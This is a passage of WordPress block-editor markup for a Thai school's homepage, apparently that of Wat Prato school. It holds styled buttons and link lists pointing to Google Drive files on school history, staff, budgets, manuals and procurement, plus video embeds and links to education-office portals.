900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a 